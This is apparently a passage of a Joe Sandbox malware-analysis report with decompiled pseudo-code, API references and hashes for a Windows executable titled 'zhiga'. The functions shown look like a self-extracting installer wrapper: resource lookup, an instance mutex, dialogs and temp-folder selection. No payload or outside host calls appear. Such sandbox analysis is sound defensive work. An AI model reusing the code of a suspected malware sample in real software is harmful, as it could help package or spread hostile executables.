                                                                        											} else {
                                                                        												L30:
                                                                        												_t23 = _t48;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										_t23 = 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00A32390(0xa38a3a);
                                                                        									goto L33;
                                                                        								}
                                                                        							} else {
                                                                        								_t64 = 0x520;
                                                                        								L32:
                                                                        								E00A344B9(0, _t64, 0, 0, 0x10, 0);
                                                                        								goto L33;
                                                                        							}
                                                                        						} else {
                                                                        							_t64 =  &_v268;
                                                                        							if(E00A3468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                        								goto L3;
                                                                        							} else {
                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                        								 *0xa38588 = _t43;
                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									if(( *0xa39a34 & 0x00000080) == 0) {
                                                                        										_t64 = 0x524;
                                                                        										if(E00A344B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                        											goto L12;
                                                                        										} else {
                                                                        											goto L11;
                                                                        										}
                                                                        									} else {
                                                                        										_t64 = 0x54b;
                                                                        										E00A344B9(0, 0x54b, "zhiga", 0, 0x10, 0);
                                                                        										L11:
                                                                        										CloseHandle( *0xa38588);
                                                                        										 *0xa39124 = 0x800700b7;
                                                                        										goto L33;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						L3:
                                                                        						_t64 = 0x4b1;
                                                                        						E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						 *0xa39124 = 0x80070714;
                                                                        						L33:
                                                                        						_t23 = 0;
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                        			}



















                                                                        0x00a32cb5
                                                                        0x00a32cbc
                                                                        0x00a32cc7
                                                                        0x00a32cc9
                                                                        0x00a32cd1
                                                                        0x00a32cd3
                                                                        0x00a32cd9
                                                                        0x00a32ce9
                                                                        0x00a32cf9
                                                                        0x00a32d0e
                                                                        0x00a32d15
                                                                        0x00a32d1c
                                                                        0x00a32ef3
                                                                        0x00000000
                                                                        0x00a32d2d
                                                                        0x00a32d34
                                                                        0x00a32d3b
                                                                        0x00a32d40
                                                                        0x00a32d48
                                                                        0x00a32d59
                                                                        0x00a32d84
                                                                        0x00a32e1f
                                                                        0x00a32e1f
                                                                        0x00a32e2e
                                                                        0x00a32e41
                                                                        0x00a32e5a
                                                                        0x00a32e62
                                                                        0x00a32e6c
                                                                        0x00a32e6c
                                                                        0x00a32e75
                                                                        0x00a32e77
                                                                        0x00a32e77
                                                                        0x00a32e84
                                                                        0x00a32e8b
                                                                        0x00a32e94
                                                                        0x00000000
                                                                        0x00a32e96
                                                                        0x00a32e96
                                                                        0x00a32e9e
                                                                        0x00a32ea2
                                                                        0x00a32eba
                                                                        0x00000000
                                                                        0x00a32ece
                                                                        0x00a32ede
                                                                        0x00a32eed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32eed
                                                                        0x00a32eef
                                                                        0x00a32eef
                                                                        0x00a32eef
                                                                        0x00a32eef
                                                                        0x00a32ea2
                                                                        0x00a32e86
                                                                        0x00a32e88
                                                                        0x00a32e88
                                                                        0x00a32e43
                                                                        0x00a32e48
                                                                        0x00000000
                                                                        0x00a32e48
                                                                        0x00a32e30
                                                                        0x00a32e30
                                                                        0x00a32ef8
                                                                        0x00a32f01
                                                                        0x00000000
                                                                        0x00a32f01
                                                                        0x00a32d8a
                                                                        0x00a32d8f
                                                                        0x00a32da1
                                                                        0x00000000
                                                                        0x00a32da3
                                                                        0x00a32dae
                                                                        0x00a32db4
                                                                        0x00a32dbb
                                                                        0x00000000
                                                                        0x00a32dca
                                                                        0x00a32dd3
                                                                        0x00a32df5
                                                                        0x00a32e02
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32dd5
                                                                        0x00a32dde
                                                                        0x00a32de3
                                                                        0x00a32e04
                                                                        0x00a32e0a
                                                                        0x00a32e10
                                                                        0x00000000
                                                                        0x00a32e10
                                                                        0x00a32dd3
                                                                        0x00a32dbb
                                                                        0x00a32da1
                                                                        0x00a32d5b
                                                                        0x00a32d5b
                                                                        0x00a32d5d
                                                                        0x00a32d69
                                                                        0x00a32d6e
                                                                        0x00a32f06
                                                                        0x00a32f06
                                                                        0x00a32f06
                                                                        0x00a32d59
                                                                        0x00a32f18

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00A32CD9
                                                                        • memset.MSVCRT ref: 00A32CE9
                                                                        • memset.MSVCRT ref: 00A32CF9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32D34
                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32D40
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32DAE
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A32DBD
                                                                        • CloseHandle.KERNEL32(zhiga,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A32E0A
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$zhiga
                                                                        • API String ID: 1002816675-3407794480
                                                                        • Opcode ID: 29742116154dc5e59e03c0643a1d3f4b20cf490256fb4f34633d12f413faed23
                                                                        • Instruction ID: 822f2e985f7c0332b43d90326e9aa08e8e03b05986074be7fc82e32284ca1fc8
                                                                        • Opcode Fuzzy Hash: 29742116154dc5e59e03c0643a1d3f4b20cf490256fb4f34633d12f413faed23
                                                                        • Instruction Fuzzy Hash: 2B51F570740301ABE764EBB49D4BBBB3AA8EB55740F204139F981D61D1DBB88C42DB21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00A334F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                        				void* _t9;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t23;
                                                                        				void* _t25;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t38;
                                                                        				void* _t39;
                                                                        
                                                                        				_t9 = _a8 - 0x10;
                                                                        				if(_t9 == 0) {
                                                                        					__eflags = 1;
                                                                        					L19:
                                                                        					_push(0);
                                                                        					 *0xa391d8 = 1;
                                                                        					L20:
                                                                        					_push(_a4);
                                                                        					L21:
                                                                        					EndDialog();
                                                                        					L22:
                                                                        					return 1;
                                                                        				}
                                                                        				_push(1);
                                                                        				_pop(1);
                                                                        				_t12 = _t9 - 0xf2;
                                                                        				if(_t12 == 0) {
                                                                        					__eflags = _a12 - 0x1b;
                                                                        					if(_a12 != 0x1b) {
                                                                        						goto L22;
                                                                        					}
                                                                        					goto L19;
                                                                        				}
                                                                        				_t13 = _t12 - 0xe;
                                                                        				if(_t13 == 0) {
                                                                        					_t35 = _a4;
                                                                        					 *0xa38584 = _t35;
                                                                        					E00A343D0(_t35, GetDesktopWindow());
                                                                        					__eflags =  *0xa38184; // 0x1
                                                                        					if(__eflags != 0) {
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                        					}
                                                                        					SetWindowTextA(_t35, "zhiga");
                                                                        					_t17 = CreateThread(0, 0, E00A34FE0, 0, 0, 0xa38798);
                                                                        					 *0xa3879c = _t17;
                                                                        					__eflags = _t17;
                                                                        					if(_t17 != 0) {
                                                                        						goto L22;
                                                                        					} else {
                                                                        						E00A344B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						_push(_t35);
                                                                        						goto L21;
                                                                        					}
                                                                        				}
                                                                        				_t23 = _t13 - 1;
                                                                        				if(_t23 == 0) {
                                                                        					__eflags = _a12 - 2;
                                                                        					if(_a12 != 2) {
                                                                        						goto L22;
                                                                        					}
                                                                        					ResetEvent( *0xa3858c);
                                                                        					_t38 =  *0xa38584; // 0x0
                                                                        					_t25 = E00A344B9(_t38, 0x4b2, 0xa31140, 0, 0x20, 4);
                                                                        					__eflags = _t25 - 6;
                                                                        					if(_t25 == 6) {
                                                                        						L11:
                                                                        						 *0xa391d8 = 1;
                                                                        						SetEvent( *0xa3858c);
                                                                        						_t39 =  *0xa3879c; // 0x0
                                                                        						E00A33680(_t39);
                                                                        						_push(0);
                                                                        						goto L20;
                                                                        					}
                                                                        					__eflags = _t25 - 1;
                                                                        					if(_t25 == 1) {
                                                                        						goto L11;
                                                                        					}
                                                                        					SetEvent( *0xa3858c);
                                                                        					goto L22;
                                                                        				}
                                                                        				if(_t23 == 0xe90) {
                                                                        					TerminateThread( *0xa3879c, 0);
                                                                        					EndDialog(_a4, _a12);
                                                                        					return 1;
                                                                        				}
                                                                        				return 0;
                                                                        			}












                                                                        0x00a334fb
                                                                        0x00a334fe
                                                                        0x00a33665
                                                                        0x00a33666
                                                                        0x00a33666
                                                                        0x00a33668
                                                                        0x00a3366e
                                                                        0x00a3366e
                                                                        0x00a33671
                                                                        0x00a33671
                                                                        0x00a33677
                                                                        0x00000000
                                                                        0x00a33677
                                                                        0x00a33504
                                                                        0x00a33506
                                                                        0x00a33507
                                                                        0x00a3350c
                                                                        0x00a3365b
                                                                        0x00a3365f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33661
                                                                        0x00a33512
                                                                        0x00a33515
                                                                        0x00a335be
                                                                        0x00a335c1
                                                                        0x00a335d1
                                                                        0x00a335d8
                                                                        0x00a335de
                                                                        0x00a335f8
                                                                        0x00a33617
                                                                        0x00a33617
                                                                        0x00a33623
                                                                        0x00a33637
                                                                        0x00a3363d
                                                                        0x00a33642
                                                                        0x00a33644
                                                                        0x00000000
                                                                        0x00a33646
                                                                        0x00a33652
                                                                        0x00a33657
                                                                        0x00a33658
                                                                        0x00000000
                                                                        0x00a33658
                                                                        0x00a33644
                                                                        0x00a3351b
                                                                        0x00a3351d
                                                                        0x00a3354f
                                                                        0x00a33553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3355f
                                                                        0x00a33565
                                                                        0x00a3357c
                                                                        0x00a33581
                                                                        0x00a33584
                                                                        0x00a3359b
                                                                        0x00a335a1
                                                                        0x00a335a7
                                                                        0x00a335ad
                                                                        0x00a335b3
                                                                        0x00a335b8
                                                                        0x00000000
                                                                        0x00a335b8
                                                                        0x00a33586
                                                                        0x00a33588
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33590
                                                                        0x00000000
                                                                        0x00a33590
                                                                        0x00a33524
                                                                        0x00a33535
                                                                        0x00a33541
                                                                        0x00000000
                                                                        0x00a33549
                                                                        0x00000000

                                                                        APIs
                                                                        • TerminateThread.KERNEL32(00000000), ref: 00A33535
                                                                        • EndDialog.USER32(?,?), ref: 00A33541
                                                                        • ResetEvent.KERNEL32 ref: 00A3355F
                                                                        • SetEvent.KERNEL32(00A31140,00000000,00000020,00000004), ref: 00A33590
                                                                        • GetDesktopWindow.USER32 ref: 00A335C7
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A335F1
                                                                        • SendMessageA.USER32(00000000), ref: 00A335F8
                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A33610
                                                                        • SendMessageA.USER32(00000000), ref: 00A33617
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A33623
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00A38798), ref: 00A33637
                                                                        • EndDialog.USER32(?,00000000), ref: 00A33671
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                        • String ID: zhiga
                                                                        • API String ID: 2406144884-3705506974
                                                                        • Opcode ID: 4ec6e711bf5911fc181ea9d13c881310cd4a571a3f13adcd76f388acf72378f6
                                                                        • Instruction ID: 26666f27d17de9f35a7f140fb59618510fb6820fa1a457cf7cb2e3aa7fd2a8e0
                                                                        • Opcode Fuzzy Hash: 4ec6e711bf5911fc181ea9d13c881310cd4a571a3f13adcd76f388acf72378f6
                                                                        • Instruction Fuzzy Hash: EB31D032248310BFDB20DFA5EC4EE7B3A79E799B01F104629F642952B0CB758A02DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 50%
                                                                        			E00A34224(char __ecx) {
                                                                        				char* _v8;
                                                                        				_Unknown_base(*)()* _v12;
                                                                        				_Unknown_base(*)()* _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				char* _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				_Unknown_base(*)()* _t28;
                                                                        				_Unknown_base(*)()* _t29;
                                                                        				_Unknown_base(*)()* _t32;
                                                                        				char _t42;
                                                                        				char* _t44;
                                                                        				char* _t61;
                                                                        				void* _t63;
                                                                        				char* _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				char _t67;
                                                                        				void* _t71;
                                                                        				char _t76;
                                                                        				intOrPtr _t85;
                                                                        
                                                                        				_t67 = __ecx;
                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                        				if(_t66 == 0) {
                                                                        					_t63 = 0x4c2;
                                                                        					L22:
                                                                        					E00A344B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                        				_v12 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L20:
                                                                        					FreeLibrary(_t66);
                                                                        					_t63 = 0x4c1;
                                                                        					goto L22;
                                                                        				}
                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                        				_v20 = _t28;
                                                                        				if(_t28 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                        				_v16 = _t29;
                                                                        				if(_t29 == 0) {
                                                                        					goto L20;
                                                                        				}
                                                                        				_t76 =  *0xa388c0; // 0x0
                                                                        				if(_t76 != 0) {
                                                                        					L10:
                                                                        					 *0xa387a0 = 0;
                                                                        					_v52 = _t67;
                                                                        					_v48 = 0;
                                                                        					_v44 = 0;
                                                                        					_v40 = 0xa38598;
                                                                        					_v36 = 1;
                                                                        					_v32 = E00A34200;
                                                                        					_v28 = 0xa388c0;
                                                                        					 *0xa3a288( &_v52);
                                                                        					_t32 =  *_v12();
                                                                        					if(_t71 != _t71) {
                                                                        						asm("int 0x29");
                                                                        					}
                                                                        					_v12 = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0xa3a288(_t32, 0xa388c0);
                                                                        						 *_v16();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						if( *0xa388c0 != 0) {
                                                                        							E00A31680(0xa387a0, 0x104, 0xa388c0);
                                                                        						}
                                                                        						 *0xa3a288(_v12);
                                                                        						 *_v20();
                                                                        						if(_t71 != _t71) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t66);
                                                                        					_t85 =  *0xa387a0; // 0x0
                                                                        					return 0 | _t85 != 0x00000000;
                                                                        				} else {
                                                                        					GetTempPathA(0x104, 0xa388c0);
                                                                        					_t61 = 0xa388c0;
                                                                        					_t4 =  &(_t61[1]); // 0xa388c1
                                                                        					_t65 = _t4;
                                                                        					do {
                                                                        						_t42 =  *_t61;
                                                                        						_t61 =  &(_t61[1]);
                                                                        					} while (_t42 != 0);
                                                                        					_t5 = _t61 - _t65 + 0xa388c0; // 0x1471181
                                                                        					_t44 = CharPrevA(0xa388c0, _t5);
                                                                        					_v8 = _t44;
                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xa388c0, _t44)) != 0x3a) {
                                                                        						 *_v8 = 0;
                                                                        					}
                                                                        					goto L10;
                                                                        				}
                                                                        			}




























                                                                        0x00a34234
                                                                        0x00a3423c
                                                                        0x00a34240
                                                                        0x00a343b2
                                                                        0x00a343b7
                                                                        0x00a343c0
                                                                        0x00000000
                                                                        0x00a343c5
                                                                        0x00a3424c
                                                                        0x00a34252
                                                                        0x00a34257
                                                                        0x00a343a4
                                                                        0x00a343a5
                                                                        0x00a343ab
                                                                        0x00000000
                                                                        0x00a343ab
                                                                        0x00a34263
                                                                        0x00a34269
                                                                        0x00a3426e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3427a
                                                                        0x00a34280
                                                                        0x00a34285
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3428d
                                                                        0x00a34293
                                                                        0x00a342e6
                                                                        0x00a342e9
                                                                        0x00a342ef
                                                                        0x00a342f4
                                                                        0x00a342f7
                                                                        0x00a34300
                                                                        0x00a34307
                                                                        0x00a3430e
                                                                        0x00a34315
                                                                        0x00a3431c
                                                                        0x00a34322
                                                                        0x00a34326
                                                                        0x00a3432d
                                                                        0x00a3432d
                                                                        0x00a3432f
                                                                        0x00a34334
                                                                        0x00a34343
                                                                        0x00a34349
                                                                        0x00a3434d
                                                                        0x00a34354
                                                                        0x00a34354
                                                                        0x00a3435d
                                                                        0x00a3436e
                                                                        0x00a3436e
                                                                        0x00a3437d
                                                                        0x00a34383
                                                                        0x00a34387
                                                                        0x00a3438e
                                                                        0x00a3438e
                                                                        0x00a34387
                                                                        0x00a34391
                                                                        0x00a34399
                                                                        0x00000000
                                                                        0x00a34295
                                                                        0x00a3429f
                                                                        0x00a342a5
                                                                        0x00a342aa
                                                                        0x00a342aa
                                                                        0x00a342ad
                                                                        0x00a342ad
                                                                        0x00a342af
                                                                        0x00a342b0
                                                                        0x00a342b6
                                                                        0x00a342c2
                                                                        0x00a342c8
                                                                        0x00a342ce
                                                                        0x00a342e4
                                                                        0x00a342e4
                                                                        0x00000000
                                                                        0x00a342ce

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A34236
                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A3424C
                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A34263
                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A3427A
                                                                        • GetTempPathA.KERNEL32(00000104,00A388C0,?,00000001), ref: 00A3429F
                                                                        • CharPrevA.USER32(00A388C0,01471181,?,00000001), ref: 00A342C2
                                                                        • CharPrevA.USER32(00A388C0,00000000,?,00000001), ref: 00A342D6
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A34391
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A343A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                        • API String ID: 1865808269-1731843650
                                                                        • Opcode ID: 8c2d2f8af65aa7c6d34fcd6e30088d41475b1c9566ece2a561d9610ce8408339
                                                                        • Instruction ID: 5558ea43b3da048cc36b90c7ba2baa2a7f49096b0f769e2d77fa066b5cce7bbf
                                                                        • Opcode Fuzzy Hash: 8c2d2f8af65aa7c6d34fcd6e30088d41475b1c9566ece2a561d9610ce8408339
                                                                        • Instruction Fuzzy Hash: ED410674A00314AFD711EFF4DC88AAEBBB8EB59384F040569F981A7351CB789C02C761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A344B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v64;
                                                                        				char _v576;
                                                                        				void* _v580;
                                                                        				struct HWND__* _v584;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t34;
                                                                        				void* _t37;
                                                                        				signed int _t39;
                                                                        				intOrPtr _t43;
                                                                        				signed int _t44;
                                                                        				signed int _t49;
                                                                        				signed int _t52;
                                                                        				void* _t54;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				int _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr* _t67;
                                                                        				signed int _t69;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t77;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				void* _t82;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t85;
                                                                        				signed int _t89;
                                                                        
                                                                        				_t75 = __edx;
                                                                        				_t34 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t34 ^ _t89;
                                                                        				_v584 = __ecx;
                                                                        				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                        				_t67 = _a4;
                                                                        				_t69 = 0xd;
                                                                        				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                        				_t80 = _t83 + _t69 + _t69;
                                                                        				_v580 = _t37;
                                                                        				asm("movsb");
                                                                        				if(( *0xa38a38 & 0x00000001) != 0) {
                                                                        					_t39 = 1;
                                                                        				} else {
                                                                        					_v576 = 0;
                                                                        					LoadStringA( *0xa39a3c, _t75,  &_v576, 0x200);
                                                                        					if(_v576 != 0) {
                                                                        						_t73 =  &_v576;
                                                                        						_t16 = _t73 + 1; // 0x1
                                                                        						_t75 = _t16;
                                                                        						do {
                                                                        							_t43 =  *_t73;
                                                                        							_t73 = _t73 + 1;
                                                                        						} while (_t43 != 0);
                                                                        						_t84 = _v580;
                                                                        						_t74 = _t73 - _t75;
                                                                        						if(_t84 == 0) {
                                                                        							if(_t67 == 0) {
                                                                        								_t27 = _t74 + 1; // 0x2
                                                                        								_t83 = _t27;
                                                                        								_t44 = LocalAlloc(0x40, _t83);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									_t75 = _t83;
                                                                        									_t74 = _t80;
                                                                        									E00A31680(_t80, _t83,  &_v576);
                                                                        									goto L23;
                                                                        								}
                                                                        							} else {
                                                                        								_t76 = _t67;
                                                                        								_t24 = _t76 + 1; // 0x1
                                                                        								_t85 = _t24;
                                                                        								do {
                                                                        									_t55 =  *_t76;
                                                                        									_t76 = _t76 + 1;
                                                                        								} while (_t55 != 0);
                                                                        								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                        								_t83 = _t25 + _t74;
                                                                        								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                        								_t80 = _t44;
                                                                        								if(_t80 == 0) {
                                                                        									goto L6;
                                                                        								} else {
                                                                        									E00A3171E(_t80, _t83,  &_v576, _t67);
                                                                        									goto L23;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t77 = _t67;
                                                                        							_t18 = _t77 + 1; // 0x1
                                                                        							_t81 = _t18;
                                                                        							do {
                                                                        								_t58 =  *_t77;
                                                                        								_t77 = _t77 + 1;
                                                                        							} while (_t58 != 0);
                                                                        							_t75 = _t77 - _t81;
                                                                        							_t82 = _t84 + 1;
                                                                        							do {
                                                                        								_t59 =  *_t84;
                                                                        								_t84 = _t84 + 1;
                                                                        							} while (_t59 != 0);
                                                                        							_t21 = _t74 + 0x64; // 0x65
                                                                        							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                        							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                        							_t80 = _t44;
                                                                        							if(_t80 == 0) {
                                                                        								goto L6;
                                                                        							} else {
                                                                        								_push(_v580);
                                                                        								E00A3171E(_t80, _t83,  &_v576, _t67);
                                                                        								L23:
                                                                        								MessageBeep(_a12);
                                                                        								if(E00A3681F(_t67) == 0) {
                                                                        									L25:
                                                                        									_t49 = 0x10000;
                                                                        								} else {
                                                                        									_t54 = E00A367C9(_t74, _t74);
                                                                        									_t49 = 0x190000;
                                                                        									if(_t54 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        								}
                                                                        								_t52 = MessageBoxA(_v584, _t80, "zhiga", _t49 | _a12 | _a16);
                                                                        								_t83 = _t52;
                                                                        								LocalFree(_t80);
                                                                        								_t39 = _t52;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						if(E00A3681F(_t67) == 0) {
                                                                        							L4:
                                                                        							_t64 = 0x10010;
                                                                        						} else {
                                                                        							_t66 = E00A367C9(0, 0);
                                                                        							_t64 = 0x190010;
                                                                        							if(_t66 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						_t44 = MessageBoxA(_v584,  &_v64, "zhiga", _t64);
                                                                        						L6:
                                                                        						_t39 = _t44 | 0xffffffff;
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                        			}



































                                                                        0x00a344b9
                                                                        0x00a344c4
                                                                        0x00a344cb
                                                                        0x00a344d8
                                                                        0x00a344e4
                                                                        0x00a344eb
                                                                        0x00a344ee
                                                                        0x00a344ef
                                                                        0x00a344ef
                                                                        0x00a344f1
                                                                        0x00a344f7
                                                                        0x00a344f8
                                                                        0x00a3467b
                                                                        0x00a344fe
                                                                        0x00a34509
                                                                        0x00a34518
                                                                        0x00a34525
                                                                        0x00a34562
                                                                        0x00a34568
                                                                        0x00a34568
                                                                        0x00a3456b
                                                                        0x00a3456b
                                                                        0x00a3456d
                                                                        0x00a3456e
                                                                        0x00a34572
                                                                        0x00a34578
                                                                        0x00a3457c
                                                                        0x00a345cb
                                                                        0x00a34607
                                                                        0x00a34607
                                                                        0x00a3460d
                                                                        0x00a34613
                                                                        0x00a34617
                                                                        0x00000000
                                                                        0x00a3461d
                                                                        0x00a34623
                                                                        0x00a34626
                                                                        0x00a34628
